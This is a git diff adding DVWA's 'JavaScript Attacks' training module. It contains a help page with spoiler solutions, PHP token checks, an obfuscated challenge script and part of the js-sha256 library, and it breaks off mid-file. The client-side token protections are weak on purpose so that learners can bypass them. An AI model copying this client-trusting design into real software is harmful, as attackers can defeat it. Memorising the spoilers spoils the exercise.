+1,3 @@ +#low_answer,#medium_answer,#high_answer { + display: none; +} diff --git a/DVWA/vulnerabilities/help.js b/DVWA/vulnerabilities/help.js new file mode 100644 index 00000000..1b36804b --- /dev/null +++ b/DVWA/vulnerabilities/help.js @@ -0,0 +1,11 @@ +function show_answer(which) { + var block = document.getElementById(which + "_answer"); + var button = document.getElementById(which + "_button"); + if (block.style.display === "" || block.style.display === "none") { + block.style.display = "block"; + button.innerText = "Hide Answer"; + } else { + block.style.display = "none"; + button.innerText = "Show Answer"; + } +} diff --git a/DVWA/vulnerabilities/javascript/help/help.php b/DVWA/vulnerabilities/javascript/help/help.php new file mode 100644 index 00000000..a679d2e4 --- /dev/null +++ b/DVWA/vulnerabilities/javascript/help/help.php @@ -0,0 +1,52 @@ +
    +

    Help - Client Side JavaScript

    + +
    +

    About

    +

    The attacks in this section are designed to help you learn about how JavaScript is used in the browser and how it can be manipulated. The attacks could be carried out by just analysing network traffic, but that isn't the point and it would also probably be a lot harder.

    + +
    + +

    Objective

    +

    Simply submit the phrase "success" to win the level. Obviously, it isn't quite that easy, each level implements different protection mechanisms, the JavaScript included in the pages has to be analysed and then manipulated to bypass the protections.

    + +
    +

    Low Level

    +

    All the JavaScript is included in the page. Read the source and work out what function is being used to generate the token required to match with the phrase and then call the function manually.

    + 
    Spoiler: Change the phrase to success and then use the function generate_token() to update the token.
    + +


    + +

    Medium Level

    +

    + The JavaScript has been broken out into its own file and then minimized. You need to view the source for the included file and then work out what it is doing. Both Firefox and Chrome have a Pretty Print feature which attempts to reverse the compression and display code in a readable way. +

    + 
    Spoiler: The file uses the setTimeout function to run the do_elsesomething function which generates the token.
    + +


    + +

    High Level

    +

    + The JavaScript has been obfuscated by at least one engine. You are going to need to step through the code to work out what is useful, what is garbage and what is needed to complete the mission. +

    + 
    Spoiler: If it helps, two packers have been used, the first is from Dan's Tools and the second is the JavaScript Obfuscator Tool.
    + 
    Spoiler 2: This deobfuscation tool seems to work the best on this code deobfuscate javascript.
    + 
    Spoiler 3: This is one way to do it... run the obfuscated JS through a deobfuscation app, intercept the response for the obfuscated JS and swap in the readable version. Work out the flow and you will see three functions that need to be called in order. Call the functions at the right time with the right parameters.
    + +


    + +

    Impossible Level

    +

    You can never trust the user and have to assume that any code sent to the user can be manipulated or bypassed and so there is no impossible level.

    + +
    + +
    + +

    Reference:

    +
      +
      • +
      • +
      • +
      • +
    +
    diff --git a/DVWA/vulnerabilities/javascript/index.php b/DVWA/vulnerabilities/javascript/index.php new file mode 100644 index 00000000..65369bad --- /dev/null +++ b/DVWA/vulnerabilities/javascript/index.php @@ -0,0 +1,123 @@ +Well done!

    "; + } else { + $message = "

    Invalid token.

    "; + } + break; + case 'medium': + if ($token == strrev("XXsuccessXX")) { + $message = "

    Well done!

    "; + } else { + $message = "

    Invalid token.

    "; + } + break; + case 'high': + if ($token == hash("sha256", hash("sha256", "XX" . strrev("success")) . "ZZ")) { + $message = "

    Well done!

    "; + } else { + $message = "

    Invalid token.

    "; + } + break; + default: + $vulnerabilityFile = 'impossible.php'; + break; + } + } else { + $message = "

    You got the phrase wrong.

    "; + } + } else { + $message = "

    Missing phrase or token.

    "; + } +} + +if ( dvwaSecurityLevelGet() == "impossible" ) { +$page[ 'body' ] = << +

    Vulnerability: JavaScript Attacks

    + +
    +

    + You can never trust anything that comes from the user or prevent them from messing with it and so there is no impossible level. +

    +EOF; +} else { +$page[ 'body' ] = << +

    Vulnerability: JavaScript Attacks

    + +
    +

    + Submit the word "success" to win. +

    + + $message + +
    + + + +
    +EOF; +} + +require_once DVWA_WEB_PAGE_TO_ROOT . "vulnerabilities/javascript/source/{$vulnerabilityFile}"; + +$page[ 'body' ] .= << +EOF; + +$page[ 'body' ] .= " +

    More Information

    +
      +
    • " . dvwaExternalLinkUrlGet( 'https://www.w3schools.com/js/' ) . "
      • +
    • " . dvwaExternalLinkUrlGet( 'https://www.youtube.com/watch?v=cs7EQdWO5o0&index=17&list=WL' ) . "
      • +
    • " . dvwaExternalLinkUrlGet( 'https://ponyfoo.com/articles/es6-proxies-in-depth' ) . "
      • +
    +

    Module developed by Digininja.

    +
    \n"; + +dvwaHtmlEcho( $page ); + +?> diff --git a/DVWA/vulnerabilities/javascript/source/high.js b/DVWA/vulnerabilities/javascript/source/high.js new file mode 100644 index 00000000..30c3833a --- /dev/null +++ b/DVWA/vulnerabilities/javascript/source/high.js @@ -0,0 +1 @@ +var a=['fromCharCode','toString','replace','BeJ','\x5cw+','Lyg','SuR','(w(){\x273M\x203L\x27;q\x201l=\x273K\x203I\x203J\x20T\x27;q\x201R=1c\x202I===\x271n\x27;q\x20Y=1R?2I:{};p(Y.3N){1R=1O}q\x202L=!1R&&1c\x202M===\x271n\x27;q\x202o=!Y.2S&&1c\x202d===\x271n\x27&&2d.2Q&&2d.2Q.3S;p(2o){Y=3R}z\x20p(2L){Y=2M}q\x202G=!Y.3Q&&1c\x202g===\x271n\x27&&2g.X;q\x202s=1c\x202l===\x27w\x27&&2l.3P;q\x201y=!Y.3H&&1c\x20Z!==\x272T\x27;q\x20m=\x273G\x27.3z(\x27\x27);q\x202w=[-3y,3x,3v,3w];q\x20U=[24,16,8,0];q\x20K=[3A,3B,3F,3E,3D,3C,3T,3U,4d,4c,4b,49,4a,4e,4f,4j,4i,4h,3u,48,47,3Z,3Y,3X,3V,3W,40,41,46,45,43,42,4k,3f,38,36,39,37,34,33,2Y,31,2Z,35,3t,3n,3m,3l,3o,3p,3s,3r,3q,3k,3j,3d,3a,3c,3b,3e,3h,3g,3i,4g];q\x201E=[\x271e\x27,\x2727\x27,\x271G\x27,\x272R\x27];q\x20l=[];p(Y.2S||!1z.1K){1z.1K=w(1x){A\x204C.Q.2U.1I(1x)===\x27[1n\x201z]\x27}}p(1y&&(Y.50||!Z.1N)){Z.1N=w(1x){A\x201c\x201x===\x271n\x27&&1x.1w&&1x.1w.1J===Z}}q\x202m=w(1X,x){A\x20w(s){A\x20O\x20N(x,1d).S(s)[1X]()}};q\x202a=w(x){q\x20P=2m(\x271e\x27,x);p(2o){P=2P(P,x)}P.1T=w(){A\x20O\x20N(x)};P.S=w(s){A\x20P.1T().S(s)};1g(q\x20i=0;i<1E.W;++i){q\x20T=1E[i];P[T]=2m(T,x)}A\x20P};q\x202P=w(P,x){q\x201S=2O(\x222N(\x271S\x27)\x22);q\x201Y=2O(\x222N(\x271w\x27).1Y\x22);q\x202n=x?\x271H\x27:\x271q\x27;q\x202z=w(s){p(1c\x20s===\x272p\x27){A\x201S.2x(2n).S(s,\x274S\x27).1G(\x271e\x27)}z{p(s===2q||s===2T){1u\x20O\x201t(1l)}z\x20p(s.1J===Z){s=O\x202r(s)}}p(1z.1K(s)||Z.1N(s)||s.1J===1Y){A\x201S.2x(2n).S(O\x201Y(s)).1G(\x271e\x27)}z{A\x20P(s)}};A\x202z};q\x202k=w(1X,x){A\x20w(G,s){A\x20O\x201P(G,x,1d).S(s)[1X]()}};q\x202f=w(x){q\x20P=2k(\x271e\x27,x);P.1T=w(G){A\x20O\x201P(G,x)};P.S=w(G,s){A\x20P.1T(G).S(s)};1g(q\x20i=0;i<1E.W;++i){q\x20T=1E[i];P[T]=2k(T,x)}A\x20P};w\x20N(x,1v){p(1v){l[0]=l[16]=l[1]=l[2]=l[3]=l[4]=l[5]=l[6]=l[7]=l[8]=l[9]=l[10]=l[11]=l[12]=l[13]=l[14]=l[15]=0;k.l=l}z{k.l=[0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0]}p(x){k.C=4I;k.B=4H;k.E=4l;k.F=4U;k.J=4J;k.I=4K;k.H=4L;k.D=4T}z{k.C=4X;k.B=4W;k.E=4Y;k.F=4Z;k.J=4V;k.I=4O;k.H=4F;k.D=4s}k.1C=k.1A=k.L=k.2i=0;k.1U=k.1L=1O;k.2j=1d;k.x=x}N.Q.S=w(s){p(k.1U){A}q\x202h,T=1c\x20s;p(T!==\x272p\x27){p(T===\x271n\x27){p(s===2q){1u\x20O\x201t(1l)}z\x20p(1y&&s.1J===Z){s=O\x202r(s)}z\x20p(!1z.1K(s)){p(!1y||!Z.1N(s)){1u\x20O\x201t(1l)}}}z{1u\x20O\x201t(1l)}2h=1d}q\x20r,M=0,i,W=s.W,l=k.l;4t(M>2]|=s[M]<>2]|=r<>2]|=(2t|(r>>6))<>2]|=(R|(r&V))<=2E){l[i>>2]|=(2D|(r>>12))<>2]|=(R|((r>>6)&V))<>2]|=(R|(r&V))<>2]|=(2X|(r>>18))<>2]|=(R|((r>>12)&V))<>2]|=(R|((r>>6)&V))<>2]|=(R|(r&V))<=1k){k.1C=l[16];k.1A=i-1k;k.1W();k.1L=1d}z{k.1A=i}}p(k.L>4r){k.2i+=k.L/2H<<0;k.L=k.L%2H}A\x20k};N.Q.1s=w(){p(k.1U){A}k.1U=1d;q\x20l=k.l,i=k.2u;l[16]=k.1C;l[i>>2]|=2w[i&3];k.1C=l[16];p(i>=4q){p(!k.1L){k.1W()}l[0]=k.1C;l[16]=l[1]=l[2]=l[3]=l[4]=l[5]=l[6]=l[7]=l[8]=l[9]=l[10]=l[11]=l[12]=l[13]=l[14]=l[15]=0}l[14]=k.2i<<3|k.L>>>29;l[15]=k.L<<3;k.1W()};N.Q.1W=w(){q\x20a=k.C,b=k.B,c=k.E,d=k.F,e=k.J,f=k.I,g=k.H,h=k.D,l=k.l,j,1a,1b,1j,v,1f,1h,1B,1Z,1V,1D;1g(j=16;j<1k;++j){v=l[j-15];1a=((v>>>7)|(v<<25))^((v>>>18)|(v<<14))^(v>>>3);v=l[j-2];1b=((v>>>17)|(v<<15))^((v>>>19)|(v<<13))^(v>>>10);l[j]=l[j-16]+1a+l[j-7]+1b<<0}1D=b&c;1g(j=0;j<1k;j+=4){p(k.2j){p(k.x){1B=4m;v=l[0]-4n;h=v-4o<<0;d=v+4p<<0}z{1B=4v;v=l[0]-4w;h=v-4G<<0;d=v+4D<<0}k.2j=1O}z{1a=((a>>>2)|(a<<30))^((a>>>13)|(a<<19))^((a>>>22)|(a<<10));1b=((e>>>6)|(e<<26))^((e>>>11)|(e<<21))^((e>>>25)|(e<<7));1B=a&b;1j=1B^(a&c)^1D;1h=(e&f)^(~e&g);v=h+1b+1h+K[j]+l[j];1f=1a+1j;h=d+v<<0;d=v+1f<<0}1a=((d>>>2)|(d<<30))^((d>>>13)|(d<<19))^((d>>>22)|(d<<10));1b=((h>>>6)|(h<<26))^((h>>>11)|(h<<21))^((h>>>25)|(h<<7));1Z=d&a;1j=1Z^(d&b)^1B;1h=(h&e)^(~h&f);v=g+1b+1h+K[j+1]+l[j+1];1f=1a+1j;g=c+v<<0;c=v+1f<<0;1a=((c>>>2)|(c<<30))^((c>>>13)|(c<<19))^((c>>>22)|(c<<10));1b=((g>>>6)|(g<<26))^((g>>>11)|(g<<21))^((g>>>25)|(g<<7));1V=c&d;1j=1V^(c&a)^1Z;1h=(g&h)^(~g&e);v=f+1b+1h+K[j+2]+l[j+2];1f=1a+1j;f=b+v<<0;b=v+1f<<0;1a=((b>>>2)|(b<<30))^((b>>>13)|(b<<19))^((b>>>22)|(b<<10));1b=((f>>>6)|(f<<26))^((f>>>11)|(f<<21))^((f>>>25)|(f<<7));1D=b&c;1j=1D^(b&d)^1V;1h=(f&g)^(~f&h);v=e+1b+1h+K[j+3]+l[j+3];1f=1a+1j;e=a+v<<0;a=v+1f<<0}k.C=k.C+a<<0;k.B=k.B+b<<0;k.E=k.E+c<<0;k.F=k.F+d<<0;k.J=k.J+e<<0;k.I=k.I+f<<0;k.H=k.H+g<<0;k.D=k.D+h<<0};N.Q.1e=w(){k.1s();q\x20C=k.C,B=k.B,E=k.E,F=k.F,J=k.J,I=k.I,H=k.H,D=k.D;q\x201e=m[(C>>28)&o]+m[(C>>24)&o]+m[(C>>20)&o]+m[(C>>16)&o]+m[(C>>12)&o]+m[(C>>8)&o]+m[(C>>4)&o]+m[C&o]+m[(B>>28)&o]+m[(B>>24)&o]+m[(B>>20)&o]+m[(B>>16)&o]+m[(B>>12)&o]+m[(B>>8)&o]+m[(B>>4)&o]+m[B&o]+m[(E>>28)&o]+m[(E>>24)&o]+m[(E>>20)&o]+m[(E>>16)&o]+m[(E>>12)&o]+m[(E>>8)&o]+m[(E>>4)&o]+m[E&o]+m[(F>>28)&o]+m[(F>>24)&o]+m[(F>>20)&o]+m[(F>>16)&o]+m[(F>>12)&o]+m[(F>>8)&o]+m[(F>>4)&o]+m[F&o]+m[(J>>28)&o]+m[(J>>24)&o]+m[(J>>20)&o]+m[(J>>16)&o]+m[(J>>12)&o]+m[(J>>8)&o]+m[(J>>4)&o]+m[J&o]+m[(I>>28)&o]+m[(I>>24)&o]+m[(I>>20)&o]+m[(I>>16)&o]+m[(I>>12)&o]+m[(I>>8)&o]+m[(I>>4)&o]+m[I&o]+m[(H>>28)&o]+m[(H>>24)&o]+m[(H>>20)&o]+m[(H>>16)&o]+m[(H>>12)&o]+m[(H>>8)&o]+m[(H>>4)&o]+m[H&o];p(!k.x){1e+=m[(D>>28)&o]+m[(D>>24)&o]+m[(D>>20)&o]+m[(D>>16)&o]+m[(D>>12)&o]+m[(D>>8)&o]+m[(D>>4)&o]+m[D&o]}A\x201e};N.Q.2U=N.Q.1e;N.Q.1G=w(){k.1s();q\x20C=k.C,B=k.B,E=k.E,F=k.F,J=k.J,I=k.I,H=k.H,D=k.D;q\x202b=[(C>>24)&u,(C>>16)&u,(C>>8)&u,C&u,(B>>24)&u,(B>>16)&u,(B>>8)&u,B&u,(E>>24)&u,(E>>16)&u,(E>>8)&u,E&u,(F>>24)&u,(F>>16)&u,(F>>8)&u,F&u,(J>>24)&u,(J>>16)&u,(J>>8)&u,J&u,(I>>24)&u,(I>>16)&u,(I>>8)&u,I&u,(H>>24)&u,(H>>16)&u,(H>>8)&u,H&u];p(!k.x){2b.4A((D>>24)&u,(D>>16)&u,(D>>8)&u,D&u)}A\x202b};N.Q.27=N.Q.1G;N.Q.2R=w(){k.1s();q\x201w=O\x20Z(k.x?28:32);q\x201i=O\x204x(1w);1i.1p(0,k.C);1i.1p(4,k.B);1i.1p(8,k.E);1i.1p(12,k.F);1i.1p(16,k.J);1i.1p(20,k.I);1i.1p(24,k.H);p(!k.x){1i.1p(28,k.D)}A\x201w};w\x201P(G,x,1v){q\x20i,T=1c\x20G;p(T===\x272p\x27){q\x20L=[],W=G.W,M=0,r;1g(i=0;i>6));L[M++]=(R|(r&V))}z\x20p(r<2A||r>=2E){L[M++]=(2D|(r>>12));L[M++]=(R|((r>>6)&V));L[M++]=(R|(r&V))}z{r=2C+(((r&23)<<10)|(G.1Q(++i)&23));L[M++]=(2X|(r>>18));L[M++]=(R|((r>>12)&V));L[M++]=(R|((r>>6)&V));L[M++]=(R|(r&V))}}G=L}z{p(T===\x271n\x27){p(G===2q){1u\x20O\x201t(1l)}z\x20p(1y&&G.1J===Z){G=O\x202r(G)}z\x20p(!1z.1K(G)){p(!1y||!Z.1N(G)){1u\x20O\x201t(1l)}}}z{1u\x20O\x201t(1l)}}p(G.W>1k){G=(O\x20N(x,1d)).S(G).27()}q\x201F=[],2e=[];1g(i=0;i<1k;++i){q\x20b=G[i]||0;1F[i]=4z^b;2e[i]=4y^b}N.1I(k,x,1v);k.S(2e);k.1F=1F;k.2c=1d;k.1v=1v}1P.Q=O\x20N();1P.Q.1s=w(){N.Q.1s.1I(k);p(k.2c){k.2c=1O;q\x202W=k.27();N.1I(k,k.x,k.1v);k.S(k.1F);k.S(2W);N.Q.1s.1I(k)}};q\x20X=2a();X.1q=X;X.1H=2a(1d);X.1q.2V=2f();X.1H.2V=2f(1d);p(2G){2g.X=X}z{Y.1q=X.1q;Y.1H=X.1H;p(2s){2l(w(){A\x20X})}}})();w\x202y(e){1g(q\x20t=\x22\x22,n=e.W-1;n>=0;n--)t+=e[n];A\x20t}w\x202J(t,y=\x224B\x22){1m.1o(\x221M\x22).1r=1q(1m.1o(\x221M\x22).1r+y)}w\x202B(e=\x224E\x22){1m.1o(\x221M\x22).1r=1q(e+1m.1o(\x221M\x22).1r)}w\x202K(a,b){1m.1o(\x221M\x22).1r=2y(1m.1o(\x222F\x22).1r)}1m.1o(\x222F\x22).1r=\x22\x22;4u(w(){2B(\x224M\x22)},4N);1m.1o(\x224P\x22).4Q(\x224R\x22,2J);2K(\x223O\x22,44);','||||||||||||||||||||this|blocks|HEX_CHARS||0x0F|if|var|code|message||0xFF|t1|function|is224||else|return|h1|h0|h7|h2|h3|key|h6|h5|h4||bytes|index|Sha256|new|method|prototype|0x80|update|type|SHIFT|0x3f|length|exports|root|ArrayBuffer|||||||||||s0|s1|typeof|true|hex|t2|for|ch|dataView|maj|64|ERROR|document|object|getElementById|setUint32|sha256|value|finalize|Error|throw|sharedMemory|buffer|obj|ARRAY_BUFFER|Array|start|ab|block|bc|OUTPUT_TYPES|oKeyPad|digest|sha224|call|constructor|isArray|hashed|token|isView|false|HmacSha256|charCodeAt|WINDOW|crypto|create|finalized|cd|hash|outputType|Buffer|da||||0x3ff||||array|||createMethod|arr|inner|process|iKeyPad|createHmacMethod|module|notString|hBytes|first|createHmacOutputMethod|define|createOutputMethod|algorithm|NODE_JS|string|null|Uint8Array|AMD|0xc0|lastByteIndex|0x800|EXTRA|createHash|do_something|nodeMethod|0xd800|token_part_2|0x10000|0xe0|0xe000|phrase|COMMON_JS|4294967296|window|token_part_3|token_part_1|WEB_WORKER|self|require|eval|nodeWrap|versions|arrayBuffer|JS_SHA256_NO_NODE_JS|undefined|toString|hmac|innerHash|0xf0|0xa2bfe8a1|0xc24b8b70||0xa81a664b||0x92722c85|0x81c2c92e|0xc76c51a3|0x53380d13|0x766a0abb|0x4d2c6dfc|0x650a7354|0x748f82ee|0x84c87814|0x78a5636f|0x682e6ff3|0x8cc70208|0x2e1b2138|0xa4506ceb|0x90befffa|0xbef9a3f7|0x5b9cca4f|0x4ed8aa4a|0x106aa070|0xf40e3585|0xd6990624|0x19a4c116|0x1e376c08|0x391c0cb3|0x34b0bcb5|0x2748774c|0xd192e819|0x0fc19dc6|32768|128|8388608|2147483648|split|0x428a2f98|0x71374491|0x59f111f1|0x3956c25b|0xe9b5dba5|0xb5c0fbcf|0123456789abcdef|JS_SHA256_NO_ARRAY_BUFFER|is|invalid|input|strict|use|JS_SHA256_NO_WINDOW|ABCD|amd|JS_SHA256_NO_COMMON_JS|global|node|0x923f82a4|0xab1c5ed5|0x983e5152|0xa831c66d|0x76f988da|0x5cb0a9dc|0x4a7484aa|0xb00327c8|0xbf597fc7|0x14292967|0x06ca6351||0xd5a79147|0xc6e00bf3|0x2de92c6f|0x240ca1cc|0x550c7dc3|0x72be5d74|0x243185be|0x12835b01|0xd807aa98|0x80deb1fe|0x9bdc06a7|0xc67178f2|0xefbe4786|0xe49b69c1|0xc19bf174|0x27b70a85|0x3070dd17|300032|1413257819|150054599|24177077|56|4294967295|0x5be0cd19|while|setTimeout|704751109|210244248|DataView|0x36|0x5c|push|ZZ|Object|143694565|YY|0x1f83d9ab|1521486534|0x367cd507|0xc1059ed8|0xffc00b31|0x68581511|0x64f98fa7|XX|300|0x9b05688c|send|addEventListener|click|utf8|0xbefa4fa4|0xf70e5939|0x510e527f|0xbb67ae85|0x6a09e667|0x3c6ef372|0xa54ff53a|JS_SHA256_NO_ARRAY_BUFFER_IS_VIEW','split'];(function(c,d){var e=function(f){while(--f){c['push'](c['shift']());}};e(++d);}(a,0x1f4));var b=function(c,d){c=c-0x0;var e=a[c];return e;};eval(function(d,e,f,g,h,i){h=function(j){return(j0x23?String[b('0x0')](j+0x1d):j[b('0x1')](0x24));};if(!''[b('0x2')](/^/,String)){while(f--){i[h(f)]=g[f]||h(f);}g=[function(k){if('wpA'!==b('0x3')){return i[k];}else{while(f--){i[k(f)]=g[f]||k(f);}g=[function(l){return i[l];}];k=function(){return b('0x4');};f=0x1;}}];h=function(){return b('0x4');};f=0x1;};while(f--){if(g[f]){if(b('0x5')===b('0x6')){return i[h];}else{d=d[b('0x2')](new RegExp('\x5cb'+h(f)+'\x5cb','g'),g[f]);}}}return d;}(b('0x7'),0x3e,0x137,b('0x8')[b('0x9')]('|'),0x0,{})); diff --git a/DVWA/vulnerabilities/javascript/source/high.php b/DVWA/vulnerabilities/javascript/source/high.php new file mode 100644 index 00000000..f37783d4 --- /dev/null +++ b/DVWA/vulnerabilities/javascript/source/high.php @@ -0,0 +1,3 @@ +'; +?> diff --git a/DVWA/vulnerabilities/javascript/source/high_unobfuscated.js b/DVWA/vulnerabilities/javascript/source/high_unobfuscated.js new file mode 100644 index 00000000..3db08e8a --- /dev/null +++ b/DVWA/vulnerabilities/javascript/source/high_unobfuscated.js @@ -0,0 +1,540 @@ +/** + * [js-sha256]{@link https://github.com/emn178/js-sha256} + * + * @version 0.9.0 + * @author Chen, Yi-Cyuan [emn178@gmail.com] + * @copyright Chen, Yi-Cyuan 2014-2017 + * @license MIT + */ +/*jslint bitwise: true */ +(function () { + 'use strict'; + + var ERROR = 'input is invalid type'; + var WINDOW = typeof window === 'object'; + var root = WINDOW ? window : {}; + if (root.JS_SHA256_NO_WINDOW) { + WINDOW = false; + } + var WEB_WORKER = !WINDOW && typeof self === 'object'; + var NODE_JS = !root.JS_SHA256_NO_NODE_JS && typeof process === 'object' && process.versions && process.versions.node; + if (NODE_JS) { + root = global; + } else if (WEB_WORKER) { + root = self; + } + var COMMON_JS = !root.JS_SHA256_NO_COMMON_JS && typeof module === 'object' && module.exports; + var AMD = typeof define === 'function' && define.amd; + var ARRAY_BUFFER = !root.JS_SHA256_NO_ARRAY_BUFFER && typeof ArrayBuffer !== 'undefined'; + var HEX_CHARS = '0123456789abcdef'.split(''); + var EXTRA = [-2147483648, 8388608, 32768, 128]; + var SHIFT = [24, 16, 8, 0]; + var K = [ + 0x428a2f98, 0x71374491, 0xb5c0fbcf, 0xe9b5dba5, 0x3956c25b, 0x59f111f1, 0x923f82a4, 0xab1c5ed5, + 0xd807aa98, 0x12835b01, 0x243185be, 0x550c7dc3, 0x72be5d74, 0x80deb1fe, 0x9bdc06a7, 0xc19bf174, + 0xe49b69c1, 0xefbe4786, 0x0fc19dc6, 0x240ca1cc, 0x2de92c6f, 0x4a7484aa, 0x5cb0a9dc, 0x76f988da, + 0x983e5152, 0xa831c66d, 0xb00327c8, 0xbf597fc7, 0xc6e00bf3, 0xd5a79147, 0x06ca6351, 0x14292967, + 0x27b70a85, 0x2e1b2138, 0x4d2c6dfc, 0x53380d13, 0x650a7354, 0x766a0abb, 0x81c2c92e, 0x92722c85, + 0xa2bfe8a1, 0xa81a664b, 0xc24b8b70, 0xc76c51a3, 0xd192e819, 0xd6990624, 0xf40e3585, 0x106aa070, + 0x19a4c116, 0x1e376c08, 0x2748774c, 0x34b0bcb5, 0x391c0cb3, 0x4ed8aa4a, 0x5b9cca4f, 0x682e6ff3, + 0x748f82ee, 0x78a5636f, 0x84c87814, 0x8cc70208, 0x90befffa, 0xa4506ceb, 0xbef9a3f7, 0xc67178f2 + ]; + var OUTPUT_TYPES = ['hex', 'array', 'digest', 'arrayBuffer']; + + var blocks = []; + + if (root.JS_SHA256_NO_NODE_JS || !Array.isArray) { + Array.isArray = function (obj) { + return Object.prototype.toString.call(obj) === '[object Array]'; + }; + } + + if (ARRAY_BUFFER && (root.JS_SHA256_NO_ARRAY_BUFFER_IS_VIEW || !ArrayBuffer.isView)) { + ArrayBuffer.isView = function (obj) { + return typeof obj === 'object' && obj.buffer && obj.buffer.constructor === ArrayBuffer; + }; + } + + var createOutputMethod = function (outputType, is224) { + return function (message) { + return new Sha256(is224, true).update(message)[outputType](); + }; + }; + + var createMethod = function (is224) { + var method = createOutputMethod('hex', is224); + if (NODE_JS) { + method = nodeWrap(method, is224); + } + method.create = function () { + return new Sha256(is224); + }; + method.update = function (message) { + return method.create().update(message); + }; + for (var i = 0; i < OUTPUT_TYPES.length; ++i) { + var type = OUTPUT_TYPES[i]; + method[type] = createOutputMethod(type, is224); + } + return method; + }; + + var nodeWrap = function (method, is224) { + var crypto = eval("require('crypto')"); + var Buffer = eval("require('buffer').Buffer"); + var algorithm = is224 ? 'sha224' : 'sha256'; + var nodeMethod = function (message) { + if (typeof message === 'string') { + return crypto.createHash(algorithm).update(message, 'utf8').digest('hex'); + } else { + if (message === null || message === undefined) { + throw new Error(ERROR); + } else if (message.constructor === ArrayBuffer) { + message = new Uint8Array(message); + } + } + if (Array.isArray(message) || ArrayBuffer.isView(message) || + message.constructor === Buffer) { + return crypto.createHash(algorithm).update(new Buffer(message)).digest('hex'); + } else { + return method(message); + } + }; + return nodeMethod; + }; + + var createHmacOutputMethod = function (outputType, is224) { + return function (key, message) { + return new HmacSha256(key, is224, true).update(message)[outputType](); + }; + }; + + var createHmacMethod = function (is224) { + var method = createHmacOutputMethod('hex', is224); + method.create = function (key) { + return new HmacSha256(key, is224); + }; + method.update = function (key, message) { + return method.create(key).update(message); + }; + for (var i = 0; i < OUTPUT_TYPES.length; ++i) { + var type = OUTPUT_TYPES[i]; + method[type] = createHmacOutputMethod(type, is224); + } + return method; + }; + + function Sha256(is224, sharedMemory) { + if (sharedMemory) { + blocks[0] = blocks[16] = blocks[1] = blocks[2] = blocks[3] = + blocks[4] = blocks[5] = blocks[6] = blocks[7] = + blocks[8] = blocks[9] = blocks[10] = blocks[11] = + blocks[12] = blocks[13] = blocks[14] = blocks[15] = 0; + this.blocks = blocks; + } else { + this.blocks = [0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0, 0]; + } + + if (is224) { + this.h0 = 0xc1059ed8; + this.h1 = 0x367cd507; + this.h2 = 0x3070dd17; + this.h3 = 0xf70e5939; + this.h4 = 0xffc00b31; + this.h5 = 0x68581511; + this.h6 = 0x64f98fa7; + this.h7 = 0xbefa4fa4; + } else { // 256 + this.h0 = 0x6a09e667; + this.h1 = 0xbb67ae85; + this.h2 = 0x3c6ef372; + this.h3 = 0xa54ff53a; + this.h4 = 0x510e527f; + this.h5 = 0x9b05688c; + this.h6 = 0x1f83d9ab; + this.h7 = 0x5be0cd19; + } + + this.block = this.start = this.bytes = this.hBytes = 0; + this.finalized = this.hashed = false; + this.first = true; + this.is224 = is224; + } + + Sha256.prototype.update = function (message) { + if (this.finalized) { + return; + } + var notString, type = typeof message; + if (type !== 'string') { + if (type === 'object') { + if (message === null) { + throw new Error(ERROR); + } else if (ARRAY_BUFFER && message.constructor === ArrayBuffer) { + message = new Uint8Array(message); + } else if (!Array.isArray(message)) { + if (!ARRAY_BUFFER || !ArrayBuffer.isView(message)) { + throw new Error(ERROR); + } + } + } else { + throw new Error(ERROR); + } + notString = true; + } + var code, index = 0, i, length = message.length, blocks = this.blocks; + + while (index < length) { + if (this.hashed) { + this.hashed = false; + blocks[0] = this.block; + blocks[16] = blocks[1] = blocks[2] = blocks[3] = + blocks[4] = blocks[5] = blocks[6] = blocks[7] = + blocks[8] = blocks[9] = blocks[10] = blocks[11] = + blocks[12] = blocks[13] = blocks[14] = blocks[15] = 0; + } + + if (notString) { + for (i = this.start; index < length && i < 64; ++index) { + blocks[i >> 2] |= message[index] << SHIFT[i++ & 3]; + } + } else { + for (i = this.start; index < length && i < 64; ++index) { + code = message.charCodeAt(index); + if (code < 0x80) { + blocks[i >> 2] |= code << SHIFT[i++ & 3]; + } else if (code < 0x800) { + blocks[i >> 2] |= (0xc0 | (code >> 6)) << SHIFT[i++ & 3]; + blocks[i >> 2] |= (0x80 | (code & 0x3f)) << SHIFT[i++ & 3]; + } else if (code < 0xd800 || code >= 0xe000) { + blocks[i >> 2] |= (0xe0 | (code >> 12)) << SHIFT[i++ & 3]; + blocks[i >> 2] |= (0x80 | ((code >> 6) & 0x3f)) << SHIFT[i++ & 3]; + blocks[i >> 2] |= (0x80 | (code & 0x3f)) << SHIFT[i++ & 3]; + } else { + code = 0x10000 + (((code & 0x3ff) << 10) | (message.charCodeAt(++index) & 0x3ff)); + blocks[i >> 2] |= (0xf0 | (code >> 18)) << SHIFT[i++ & 3]; + blocks[i >> 2] |= (0x80 | ((code >> 12) & 0x3f)) << SHIFT[i++ & 3]; + blocks[i >> 2] |= (0x80 | ((code >> 6) & 0x3f)) << SHIFT[i++ & 3]; + blocks[i >> 2] |= (0x80 | (code & 0x3f)) << SHIFT[i++ & 3]; + } + } + } + + this.lastByteIndex = i; + this.bytes += i - this.start; + if (i >= 64) { + this.block = blocks[16]; + this.start = i - 64; + this.hash(); + this.hashed = true; + } else { + this.start = i; + } + } + if (this.bytes > 4294967295) { + this.hBytes += this.bytes / 4294967296 << 0; + this.bytes = this.bytes % 4294967296; + } + return this; + }; + + Sha256.prototype.finalize = function () { + if (this.finalized) { + return; + } + this.finalized = true; + var blocks = this.blocks, i = this.lastByteIndex; + blocks[16] = this.block; + blocks[i >> 2] |= EXTRA[i & 3]; + this.block = blocks[16]; + if (i >= 56) { + if (!this.hashed) { + this.hash(); + } + blocks[0] = this.block; + blocks[16] = blocks[1] = blocks[2] = blocks[3] = + blocks[4] = blocks[5] = blocks[6] = blocks[7] = + blocks[8] = blocks[9] = blocks[10] = blocks[11] = + blocks[12] = blocks[13] = blocks[14] = blocks[15] = 0; + } + blocks[14] = this.hBytes << 3 | this.bytes >>> 29; + blocks[15] = this.bytes << 3; + this.hash(); + }; + + Sha256.prototype.hash = function () { + var a = this.h0, b = this.h1, c = this.h2, d = this.h3, e = this.h4, f = this.h5, g = this.h6, + h = this.h7, blocks = this.blocks, j, s0, s1, maj, t1, t2, ch, ab, da, cd, bc; + + for (j = 16; j < 64; ++j) { + // rightrotate + t1 = blocks[j - 15]; + s0 = ((t1 >>> 7) | (t1 << 25)) ^ ((t1 >>> 18) | (t1 << 